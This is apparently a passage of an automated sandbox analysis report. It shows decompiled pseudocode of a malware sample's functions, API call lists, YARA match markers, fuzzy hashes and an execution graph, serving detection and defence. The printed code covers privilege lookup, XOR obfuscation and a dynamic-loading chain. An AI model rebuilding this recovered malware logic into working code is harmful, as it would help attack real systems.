											__ecx = 0;
											__eax = _a12 + 0x220;
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E00417F90(__edi, _a12 + 0x220,  *(__esi + 0x2d0), __ebx, _a12 + 0x220);
											__ecx = 0;
											 *(__esi + 0x2dc) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v132;
												_t45 = __esi + 0x2e0; // 0x2e0
												__eax = _t45;
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												_a12 = _a12 + 0x224;
												 *(__esi + 0x2e4) = _v132;
												 *__ebx = 0x18;
												 *(__esi + 0x2d0) = 0x1a;
												__eax = E00417FD0(__edi, _a12 + 0x224, 0x1a, __ebx, _t45);
												 *(__esi + 0x2dc) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a8;
													 *(__edx + 0x10) =  *(__edx + 0x10) + 0x200;
													__eflags =  *(__edx + 0x10) + 0x200;
													__eax = E00419670(__ecx);
													__ebx = __eax;
													__eax =  *(__ebx + 0x28);
													__eax = E0041A3B0( *(__ebx + 0x28));
													__edx =  *(__ebx + 0x28);
													_t60 = __eax + 2; // 0x2
													__ecx = __eax + _t60;
													__eax =  &_v656;
													__eax = E00413A50(__edi,  &_v656, 2, 0); // executed
													_pop(__edi);
													_pop(__esi);
													_pop(__ebx);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
												}
											}
										}
									} else {
										goto L16;
									}
								}
							}
						}
						goto L24;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L24:
			}




















                                                      0x00407305
                                                      0x00407305
                                                      0x00407308
                                                      0x0040730c
                                                      0x0040729e
                                                      0x004072ae
                                                      0x004072be
                                                      0x004072c3
                                                      0x004072c8
                                                      0x004072ca
                                                      0x004072cd
                                                      0x004072ce
                                                      0x004072da
                                                      0x004072da
                                                      0x004072dc
                                                      0x004072de
                                                      0x004072fb
                                                      0x004072fb
                                                      0x004072fd
                                                      0x00407302
                                                      0x0040730e
                                                      0x0040730e
                                                      0x00407310
                                                      0x00407311
                                                      0x00407313
                                                      0x00407319
                                                      0x0040731a
                                                      0x0040731b
                                                      0x0040731c
                                                      0x00407324
                                                      0x00407327
                                                      0x00407334
                                                      0x00407339
                                                      0x0040733c
                                                      0x00407342
                                                      0x00407347
                                                      0x0040734f
                                                      0x0040735a
                                                      0x0040735a
                                                      0x00407361
                                                      0x00407370
                                                      0x00407376
                                                      0x0040737b
                                                      0x00407388
                                                      0x00407392
                                                      0x0040739a
                                                      0x004073a0
                                                      0x004073a2
                                                      0x00000000
                                                      0x00000000
                                                      0x004073a4
                                                      0x004073ac
                                                      0x004073c6
                                                      0x004073c6
                                                      0x004073c9
                                                      0x004073ca
                                                      0x004073cd
                                                      0x004073d0
                                                      0x00000000
                                                      0x004073d2
                                                      0x004073d2
                                                      0x00000000
                                                      0x004073d2
                                                      0x004073ae
                                                      0x004073ae
                                                      0x004073b5
                                                      0x00000000
                                                      0x004073b7
                                                      0x004073b7
                                                      0x004073be
                                                      0x00000000
                                                      0x004073c0
                                                      0x004073c0
                                                      0x004073c4
                                                      0x004073e0
                                                      0x004073e8
                                                      0x004073f0
                                                      0x004073f5
                                                      0x004073fd
                                                      0x004073fd
                                                      0x00407405
                                                      0x0040740d
                                                      0x0040740f
                                                      0x00000000
                                                      0x00407411
                                                      0x00407411
                                                      0x00407417
                                                      0x0040741a
                                                      0x00407420
                                                      0x00407423
                                                      0x00407429
                                                      0x00407429
                                                      0x00407430
                                                      0x00407432
                                                      0x00407435
                                                      0x00407435
                                                      0x0040743c
                                                      0x0040743f
                                                      0x00407446
                                                      0x0040744c
                                                      0x00407452
                                                      0x00407458
                                                      0x0040745e
                                                      0x00407464
                                                      0x0040746a
                                                      0x0040746f
                                                      0x00407474
                                                      0x0040747a
                                                      0x0040747c
                                                      0x00000000
                                                      0x00407482
                                                      0x00407482
                                                      0x00407485
                                                      0x00407485
                                                      0x0040748c
                                                      0x00407492
                                                      0x00407498
                                                      0x0040749e
                                                      0x004074a4
                                                      0x004074b0
                                                      0x004074b8
                                                      0x004074be
                                                      0x004074c4
                                                      0x004074ce
                                                      0x004074d6
                                                      0x004074dc
                                                      0x004074de
                                                      0x00000000
                                                      0x004074e4
                                                      0x004074e4
                                                      0x004074ea
                                                      0x004074ea
                                                      0x004074f0
                                                      0x004074fd
                                                      0x004074ff
                                                      0x00407503
                                                      0x00407508
                                                      0x0040750b
                                                      0x0040750b
                                                      0x0040751b
                                                      0x00407523
                                                      0x0040752b
                                                      0x0040752c
                                                      0x0040752d
                                                      0x0040752e
                                                      0x00407530
                                                      0x00407531
                                                      0x00407531
                                                      0x004074de
                                                      0x0040747c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004073c4
                                                      0x004073be
                                                      0x004073b5
                                                      0x00000000
                                                      0x004073ac
                                                      0x004073d7
                                                      0x004073d8
                                                      0x004073d9
                                                      0x004073d9
                                                      0x004073db
                                                      0x004073dc
                                                      0x004073de
                                                      0x004073df
                                                      0x004073df
                                                      0x00000000

                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: b72b3ff8d7146015b4160c7a2f9311d3bb88061f7b67835bd092b3660ca99e5e
                                                      • Instruction ID: 876f1f7e9c94b02fb5d4ad078d2ed7a453e6bd2aa79c22fd683b851587cebbaa
                                                      • Opcode Fuzzy Hash: b72b3ff8d7146015b4160c7a2f9311d3bb88061f7b67835bd092b3660ca99e5e
                                                      • Instruction Fuzzy Hash: D061A570900209AFD724DF65DC85FEB77B8AB44304F10446EF909A7281DB78BD41CBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407280 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 413 407280-4072ca call 41a140 call 41ad20 call 409b40 call 413e50 423 4072cc-4072da PostThreadMessageW 413->423 424 4072fe-407302 413->424 425 4072dc-4072de 423->425 426 4072e0-4072fa call 4092a0 425->426 427 4072fd 425->427 426->427 427->424
                                                      C-Code - Quality: 82%
                                                      			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				int _t13;
				long _t20;
				int _t24;
				void* _t25;
				void* _t29;
				int _t30;

				_t29 = __eflags;
				_v68 = 0;
				E0041A140( &_v67, 0, 0x3f);
				E0041AD20( &_v68, 3);
				_t12 = E00409B40(_t29, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t24 = _t13;
				_t30 = _t24;
				if(_t30 != 0) {
					_t20 = _a8;
					if(_t30 < 0) {
						_t13 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
					}
					_t31 = _t13;
					if(_t13 == 0) {
						_t13 =  *_t24(_t20, 0x8003, _t25 + (E004092A0(_t31, 1, 8) & 0x000000ff) - 0x40, _t13);
					}
					return _t13;
				}
				return _t13;
			}












                                                      0x00407280
                                                      0x0040728f
                                                      0x00407293
                                                      0x0040729e
                                                      0x004072ae
                                                      0x004072be
                                                      0x004072c3
                                                      0x004072c8
                                                      0x004072ca
                                                      0x004072cd
                                                      0x004072ce
                                                      0x004072da
                                                      0x004072da
                                                      0x004072dc
                                                      0x004072de
                                                      0x004072fb
                                                      0x004072fb
                                                      0x00000000
                                                      0x004072fd
                                                      0x00407302

                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                      • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                                      • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                      • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407303 Relevance: 1.5, APIs: 1, Instructions: 25threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 454 407303 456 4072d0-4072da PostThreadMessageW 454->456 457 4072dc-4072de 454->457 456->457 458 4072e0-4072fa call 4092a0 457->458 459 4072fd-407302 457->459 458->459
                                                      C-Code - Quality: 58%
                                                      			E00407303(intOrPtr* __esi, void* __eflags) {
				int _t3;
				long _t7;
				intOrPtr* _t9;
				void* _t11;

				_t9 = __esi;
				if(__eflags < 0) {
					_t3 = PostThreadMessageW(_t7, 0x111, 0, 0); // executed
				}
				_t17 = _t3;
				if(_t3 == 0) {
					_t3 =  *_t9(_t7, 0x8003, _t11 + (E004092A0(_t17, 1, 8) & 0x000000ff) - 0x40, _t3);
				}
				return _t3;
			}







                                                      0x00407303
                                                      0x004072ce
                                                      0x004072da
                                                      0x004072da
                                                      0x004072dc
                                                      0x004072de
                                                      0x004072fb
                                                      0x004072fb
                                                      0x00407302

                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 842b354418d615c723ca88be0b85315682146f27673c32ee823317f377e052bb
                                                      • Instruction ID: 75953388b3a038e180496df6f2c277d499297c5e6f2c9266baa6d640101f9137
                                                      • Opcode Fuzzy Hash: 842b354418d615c723ca88be0b85315682146f27673c32ee823317f377e052bb
                                                      • Instruction Fuzzy Hash: 1EE01221B9421935E92055556C43FBA36589751B05F6004BFFB04F81C1D9D9240556F6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004188F0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                      0x004188ff
                                                      0x00418907
                                                      0x0041891d
                                                      0x00418921

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00418A50 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                      0x00418a6a
                                                      0x00418a80
                                                      0x00418a84

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00418922 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E00418922(intOrPtr _a4, int _a8) {
				signed char _t10;
				signed int _t11;
				void* _t16;
				signed char _t17;
				int _t21;
				void* _t22;

				asm("out 0x90, eax");
				_t11 = _t10 ^  *(_t16 - 0x262fab82);
				_t21 = _t11 * _t17 >> 0x20;
				if(_t11 * _t17 == 0) {
					L3:
					_push(es);
					ExitProcess(_t21);
				}
				_t15 = _a4;
				_t8 = _t15 + 0xc7c; // 0x8bec97d1
				E004191E0(_t22, _a4, _t8,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36);
				_t21 = _a8;
				goto L3;
			}









                                                      0x00418922
                                                      0x00418925
                                                      0x0041892b
                                                      0x0041892d
                                                      0x00418951
                                                      0x00418953
                                                      0x00418958
                                                      0x00418958
                                                      0x00418933
                                                      0x00418942
                                                      0x0041894a
                                                      0x0041894f
                                                      0x00000000

                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: b141c7c086a07b6aa7614122dd88b87bfe30fcde0a4593ba4501d525e2845ddd
                                                      • Instruction ID: 8075bfb8c7973218f52e21029c2786017616711d21bda410d6718783f9f14bae
                                                      • Opcode Fuzzy Hash: b141c7c086a07b6aa7614122dd88b87bfe30fcde0a4593ba4501d525e2845ddd
                                                      • Instruction Fuzzy Hash: 08E026712085412BE7018B784C8EED33F988F46340F18489AF8D84F213C4289A42C7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00418930 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E00418930(intOrPtr _a4, int _a8) {
				int _t9;
				void* _t10;

				_t5 = _a4;
				_t3 = _t5 + 0xc7c; // 0x8bec97d1
				E004191E0(_t10, _a4, _t3,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				_t9 = _a8;
				_push(es);
				ExitProcess(_t9);
			}





                                                      0x00418933
                                                      0x00418942
                                                      0x0041894a
                                                      0x0041894f
                                                      0x00418953
                                                      0x00418958

                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00415681 Relevance: .0, Instructions: 14COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00415681(void* __eax, void* __ebx, signed int* __edx) {

				 *__edx =  *__edx ^ 0x5b53d644;
				return __edx;
			}



                                                      0x00415684
                                                      0x00415696

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d14350f5905cbfdda0143067de4325199c12f68d658b15841afbe04abbbe725c
                                                      • Instruction ID: efce8b38cc42e0a72207b25693d950f6b240b92dce7d07120b00ae9d3136fb58
                                                      • Opcode Fuzzy Hash: d14350f5905cbfdda0143067de4325199c12f68d658b15841afbe04abbbe725c
                                                      • Instruction Fuzzy Hash: 80B09277F491164E65191C2DBC031B9F774EAC30B9B0463A3CC0EBB552C643C42B499C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:4.8%
                                                      Dynamic/Decrypted Code Coverage:2%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:694
                                                      Total number of Limit Nodes:84
                                                      execution_graph 30887 4aad3ed 30890 4aa9c80 30887->30890 30891 4aa9ca6 30890->30891 30898 4a98b60 30891->30898 30893 4aa9cb2 30894 4aa9cd6 30893->30894 30906 4a97e40 30893->30906 30938 4aa8930 30894->30938 30941 4a98ab0 30898->30941 30900 4a98b6d 30901 4a98b74 30900->30901 30953 4a98a50 30900->30953 30901->30893 30907 4a97e67 30906->30907 31367 4a9a010 30907->31367 30909 4a97e79 31371 4a99d60 30909->31371 30911 4a97e96 30917 4a97e9d 30911->30917 31422 4a99c90 LdrLoadDll 30911->31422 30914 4a97f06 30915 4aaa270 2 API calls 30914->30915 30935 4a97fe4 30914->30935 30916 4a97f1c 30915->30916 30918 4aaa270 2 API calls 30916->30918 30917->30935 31375 4a9d170 30917->31375 30919 4a97f2d 30918->30919 30920 4aaa270 2 API calls 30919->30920 30921 4a97f3e 30920->30921 31387 4a9aed0 30921->31387 30923 4a97f51 30924 4aa3a50 8 API calls 30923->30924 30925 4a97f62 30924->30925 30926 4aa3a50 8 API calls 30925->30926 30927 4a97f73 30926->30927 30928 4a97f93 30927->30928 31399 4a9ba40 30927->31399 30930 4aa3a50 8 API calls 30928->30930 30937 4a97fdb 30928->30937 30934 4a97faa 30930->30934 30934->30937 31424 4a9bae0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 30934->31424 30935->30894 31405 4a97c70 30937->31405 30939 4aa894f 30938->30939 30940 4aa91e0 LdrLoadDll 30938->30940 30940->30939 30942 4a98ac3 30941->30942 30992 4aa6e50 LdrLoadDll 30941->30992 30972 4aa6d00 30942->30972 30945 4a98acc 30946 4a98ad6 30945->30946 30975 4aa9530 30945->30975 30946->30900 30948 4a98b13 30948->30946 30986 4a988d0 30948->30986 30950 4a98b33 30993 4a98320 LdrLoadDll 30950->30993 30952 4a98b45 30952->30900 30954 4a98a6a 30953->30954 30955 4aa9820 LdrLoadDll 30953->30955 31342 4aa9820 30954->31342 30955->30954 30958 4aa9820 LdrLoadDll 30959 4a98a91 30958->30959 30960 4a9cf70 30959->30960 30961 4a9cf89 30960->30961 31350 4a99e90 30961->31350 30963 4a9cf9c 31354 4aa8460 30963->31354 30966 4a98b85 30966->30893 30968 4a9cfc2 30969 4a9cfed 30968->30969 31360 4aa84e0 30968->31360 30971 4aa8710 2 API calls 30969->30971 30971->30966 30994 4aa8880 30972->30994 30976 4aa9549 30975->30976 31007 4aa3a50 30976->31007 30978 4aa9561 30979 4aa956a 30978->30979 31046 4aa9370 30978->31046 30979->30948 30981 4aa957e 30981->30979 31064 4aa8180 30981->31064 30989 4a988ea 30986->30989 31320 4a96e20 30986->31320 30988 4a988f1 30988->30950 30989->30988 31333 4a970e0 30989->31333 30992->30942 30993->30952 30997 4aa91e0 30994->30997 30996 4aa6d15 30996->30945 30998 4aa91f0 30997->30998 31000 4aa9212 30997->31000 31001 4aa3e50 30998->31001 31000->30996 31002 4aa3e6a 31001->31002 31004 4aa3e5e 31001->31004 31002->31000 31004->31002 31006 4aa42d0 LdrLoadDll 31004->31006 31005 4aa3fbc 31005->31000 31006->31005 31008 4aa3d85 31007->31008 31018 4aa3a64 31007->31018 31008->30978 31011 4aa3b7d 31011->30978 31012 4aa3b73 31132 4aa86e0 LdrLoadDll 31012->31132 31013 4aa3b90 31075 4aa85e0 31013->31075 31016 4aa3bb7 31017 4aaa0a0 2 API calls 31016->31017 31021 4aa3bc3 31017->31021 31018->31008 31072 4aa7ed0 31018->31072 31019 4aa3d49 31020 4aa8710 2 API calls 31019->31020 31023 4aa3d50 31020->31023 31021->31011 31021->31019 31022 4aa3d5f 31021->31022 31026 4aa3c52 31021->31026 31141 4aa3790 LdrLoadDll NtReadFile NtClose 31022->31141 31023->30978 31025 4aa3d72 31025->30978 31027 4aa3cb9 31026->31027 31029 4aa3c61 31026->31029 31027->31019 31028 4aa3ccc 31027->31028 31134 4aa8560 31028->31134 31031 4aa3c7a 31029->31031 31032 4aa3c66 31029->31032 31033 4aa3c7f 31031->31033 31034 4aa3c97 31031->31034 31133 4aa3650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31032->31133 31078 4aa36f0 31033->31078 31034->31023 31090 4aa3410 31034->31090 31039 4aa3c70 31039->30978 31040 4aa3c8d 31040->30978 31042 4aa3d2c 31138 4aa8710 31042->31138 31043 4aa3caf 31043->30978 31045 4aa3d38 31045->30978 31047 4aa9381 31046->31047 31048 4aa9393 31047->31048 31159 4aaa020 31047->31159 31048->30981 31050 4aa93b4 31162 4aa3060 31050->31162 31052 4aa93d7 31053 4aa9400 31052->31053 31054 4aa3060 3 API calls 31052->31054 31053->30981 31056 4aa93f9 31054->31056 31056->31053 31194 4aa4390 31056->31194 31057 4aa948a 31058 4aa949a 31057->31058 31288 4aa9180 LdrLoadDll 31057->31288 31204 4aa8ff0 31058->31204 31061 4aa94c8 31283 4aa8140 31061->31283 31065 4aa91e0 LdrLoadDll 31064->31065 31066 4aa819c 31065->31066 31314 4dc967a 31066->31314 31067 4aa81b7 31069 4aaa0a0 31067->31069 31317 4aa88f0 31069->31317 31071 4aa95d9 31071->30948 31073 4aa91e0 LdrLoadDll 31072->31073 31074 4aa3b44 31073->31074 31074->31011 31074->31012 31074->31013 31076 4aa91e0 LdrLoadDll 31075->31076 31077 4aa85fc NtCreateFile 31076->31077 31077->31016 31079 4aa370c 31078->31079 31080 4aa8560 LdrLoadDll 31079->31080 31081 4aa372d 31080->31081 31082 4aa3748 31081->31082 31083 4aa3734 31081->31083 31085 4aa8710 2 API calls 31082->31085 31084 4aa8710 2 API calls 31083->31084 31086 4aa373d 31084->31086 31087 4aa3751 31085->31087 31086->31040 31142 4aaa2b0 LdrLoadDll RtlAllocateHeap 31087->31142 31089 4aa375c 31089->31040 31091 4aa345b 31090->31091 31092 4aa348e 31090->31092 31094 4aa8560 LdrLoadDll 31091->31094 31093 4aa35d9 31092->31093 31097 4aa34aa 31092->31097 31095 4aa8560 LdrLoadDll 31093->31095 31096 4aa3476 31094->31096 31102 4aa35f4 31095->31102 31098 4aa8710 2 API calls 31096->31098 31099 4aa8560 LdrLoadDll 31097->31099 31100 4aa347f 31098->31100 31101 4aa34c5 31099->31101 31100->31043 31104 4aa34cc 31101->31104 31105 4aa34e1 31101->31105 31155 4aa85a0 LdrLoadDll 31102->31155 31109 4aa8710 2 API calls 31104->31109 31106 4aa34fc 31105->31106 31107 4aa34e6 31105->31107 31117 4aa3501 31106->31117 31143 4aaa270 31106->31143 31110 4aa8710 2 API calls 31107->31110 31108 4aa362e 31111 4aa8710 2 API calls 31108->31111 31112 4aa34d5 31109->31112 31113 4aa34ef 31110->31113 31114 4aa3639 31111->31114 31112->31043 31113->31043 31114->31043 31125 4aa3513 31117->31125 31146 4aa8690 31117->31146 31118 4aa3567 31119 4aa357e 31118->31119 31154 4aa8520 LdrLoadDll 31118->31154 31121 4aa359a 31119->31121 31122 4aa3585 31119->31122 31124 4aa8710 2 API calls 31121->31124 31123 4aa8710 2 API calls 31122->31123 31123->31125 31126 4aa35a3 31124->31126 31125->31043 31127 4aa35cf 31126->31127 31149 4aa9e70 31126->31149 31127->31043 31129 4aa35ba 31130 4aaa0a0 2 API calls 31129->31130 31131 4aa35c3 31130->31131 31131->31043 31132->31011 31133->31039 31135 4aa91e0 LdrLoadDll 31134->31135 31136 4aa3d14 31135->31136 31137 4aa85a0 LdrLoadDll 31136->31137 31137->31042 31139 4aa872c NtClose 31138->31139 31140 4aa91e0 LdrLoadDll 31138->31140 31139->31045 31140->31139 31141->31025 31142->31089 31156 4aa88b0 31143->31156 31145 4aaa288 31145->31117 31147 4aa91e0 LdrLoadDll 31146->31147 31148 4aa86ac NtReadFile 31147->31148 31148->31118 31150 4aa9e7d 31149->31150 31151 4aa9e94 31149->31151 31150->31151 31152 4aaa270 2 API calls 31150->31152 31151->31129 31153 4aa9eab 31152->31153 31153->31129 31154->31119 31155->31108 31157 4aa91e0 LdrLoadDll 31156->31157 31158 4aa88cc RtlAllocateHeap 31157->31158 31158->31145 31289 4aa87c0 31159->31289 31161 4aaa04d 31161->31050 31163 4aa3071 31162->31163 31164 4aa3079 31162->31164 31163->31052 31165 4aa334c 31164->31165 31292 4aab250 31164->31292 31165->31052 31167 4aa30cd 31168 4aab250 2 API calls 31167->31168 31171 4aa30d8 31168->31171 31169 4aa3126 31172 4aab250 2 API calls 31169->31172 31171->31169 31173 4aab380 3 API calls 31171->31173 31306 4aab2f0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 31171->31306 31175 4aa313a 31172->31175 31173->31171 31174 4aa3197 31176 4aab250 2 API calls 31174->31176 31175->31174 31297 4aab380 31175->31297 31177 4aa31ad 31176->31177 31179 4aa31ea 31177->31179 31181 4aab380 3 API calls 31177->31181 31180 4aab250 2 API calls 31179->31180 31182 4aa31f5 31180->31182 31181->31177 31183 4aab380 3 API calls 31182->31183 31190 4aa322f 31182->31190 31183->31182 31186 4aab2b0 2 API calls 31187 4aa332e 31186->31187 31188 4aab2b0 2 API calls 31187->31188 31189 4aa3338 31188->31189 31191 4aab2b0 2 API calls 31189->31191 31303 4aab2b0 31190->31303 31192 4aa3342 31191->31192 31193 4aab2b0 2 API calls 31192->31193 31193->31165 31195 4aa43a1 31194->31195 31196 4aa3a50 8 API calls 31195->31196 31198 4aa43b7 31196->31198 31197 4aa440a 31197->31057 31198->31197 31199 4aa43f2 31198->31199 31200 4aa4405 31198->31200 31201 4aaa0a0 2 API calls 31199->31201 31202 4aaa0a0 2 API calls 31200->31202 31203 4aa43f7 31201->31203 31202->31197 31203->31057 31205 4aa9004 31204->31205 31206 4aa8eb0 LdrLoadDll 31204->31206 31307 